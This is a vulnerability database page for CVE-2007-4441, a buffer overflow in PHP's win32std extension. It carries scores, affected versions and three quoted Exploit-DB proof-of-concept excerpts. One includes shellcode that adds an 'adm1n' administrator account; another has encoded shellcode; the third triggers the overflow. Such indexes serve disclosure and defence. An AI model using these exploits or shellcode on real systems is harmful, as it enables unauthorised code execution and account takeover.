CVE-2007-4441
published 2007-08-21CVE-2007-4441: Buffer overflow in php_win32std.dll in the win32std extension for PHP 5.2.0 and earlier allows context-dependent attackers to execute arbitrary code via a long…
PriorityP422medium4.6CVSS 2.0
AVLACLAuNCPIPAP
EXPLOIT
EPSS
1.52%
71.5th percentile
Buffer overflow in php_win32std.dll in the win32std extension for PHP 5.2.0 and earlier allows context-dependent attackers to execute arbitrary code via a long string in the filename argument to the win_browse_file function.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php | php | <= 5.2.0 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
PHP 5.2.3 - 'PHP_win32sti' Local Buffer Overflow (2)
exploitdb·2007-08-22
CVE-2007-4441 PHP 5.2.3 - 'PHP_win32sti' Local Buffer Overflow (2)
PHP 5.2.3 - 'PHP_win32sti' Local Buffer Overflow (2)
---
"adm1n" [password]=>"netjackal"
$SC=
"\xEB\x19\x5A\x31\xC0\x50\x88\x42\x52\x52\xBB\x6D\x13\x86".
"\x7C\xFF\xD3\xBB\xDA\xCD\x81\x7C\x31\xC0\x50\xFF\xD3\xE8".
"\xE2\xFF\xFF\xFF\x63\x6D\x64\x2E\x65\x78\x65\x20\x2F\x63".
"\x20\x6E\x65\x74\x20\x75\x73\x65\x72\x20\x61\x64\x6D\x31".
"\x6E\x20\x6E\x65\x74\x6A\x61\x63\x6B\x61\x6C\x20\x2F\x61".
"\x64\x64\x26\x26\x6E\x65\x74\x20\x6C\x6F\x63\x61\x6C\x67".
"\x72\x6F\x75\x70\x20\x41\x64\x6D\x69\x6E\x69\x73\x74\x72".
"\x61\x74\x6F\x72\x73\x20\x2F\x61\x64\x64\x20\x61\x64\x6D".
"\x31\x6E\x58";
$RET="\x70\xE6\x16\x01";
$BOMB=str_repeat("\x90",24).$SC.str_repeat("A",121).$RET;
win_browse_file(1,NULL,$BOMB,NULL,array( "*" => "*.*"));
?>
# milw0rm.com [2007-08-22]
Exploit-DB
PHP 5.2.3 - 'PHP_win32sti' Local Buffer Overflow (1)
exploitdb·2007-08-22
CVE-2007-4441 PHP 5.2.3 - 'PHP_win32sti' Local Buffer Overflow (1)
PHP 5.2.3 - 'PHP_win32sti' Local Buffer Overflow (1)
---
7ffdf020 7c911005 7c9110ed 00000001 00000000
shoutz go to Kevin Finisterre
*/
if(!function_exists('win_browse_file')) {
die('win32std extension is not available');
}
$shellcode=
"\x2b\xc9\xb1\x51\xba\xbb\xb2\xd5\x31\xda\xda\xd9\x74\x24\xf4".
"\x58\x31\x50\x0e\x83\xc0\x04\x03\xeb\xb8\x37\xc4\xf7\xd7\x5c".
"\x6a\xef\xd1\x5c\x8a\x10\x41\x28\x19\xca\xa6\xa5\xa7\x2e\x2c".
"\xc5\x22\x36\x33\xd9\xa6\x89\x2b\xae\xe6\x35\x4d\x5b\x51\xbe".
"\x79\x10\x63\x2e\xb0\xe6\xfd\x02\x37\x26\x89\x5d\xf9\x6d\x7f".
"\x60\x3b\x9a\x74\x59\xef\x79\x5d\xe8\xea\x09\xc2\x36\xf4\xe6".
"\x9b\xbd\xfa\xb3\xe8\x9e\x1e\x45\x04\x23\x33\xce\x53\x4f\x6f".
"\xcc\x02\x4c\x5e\x37\xa0\xd9\xe2\xf7\xa2\x9d\xe8\x7c\xc4\x01".
"\x5c\x09\x65\x31\xc0\x66\xe8\x0f\xf2\x9a\xa4\x7
Exploit-DB
PHP 5.2.0 (Windows x86) - 'PHP_win32sti' Local Buffer Overflow
exploitdb·2007-08-18
CVE-2007-4441 PHP 5.2.0 (Windows x86) - 'PHP_win32sti' Local Buffer Overflow
PHP 5.2.0 (Windows x86) - 'PHP_win32sti' Local Buffer Overflow
---
// [x] Risk: Local Buffer Overflow (Medium - High Risk)
// [x] Notes: EDX and EIP are able to be controlled and therefore
// have the potential to dictate program flow.
//
// [x] "Sangre, sonando, de rabia naci.. Who do you trust?"
//
// ==================================================================================
if ( !extension_loaded("win32std") )
{
die;
}
win_browse_file( 1, NULL, str_repeat( "\x90", 264 ), NULL, array( "*" => "*.*" ) );
?>
# milw0rm.com [2007-08-18]
No writeups or analysis indexed.
2007-08-21
Published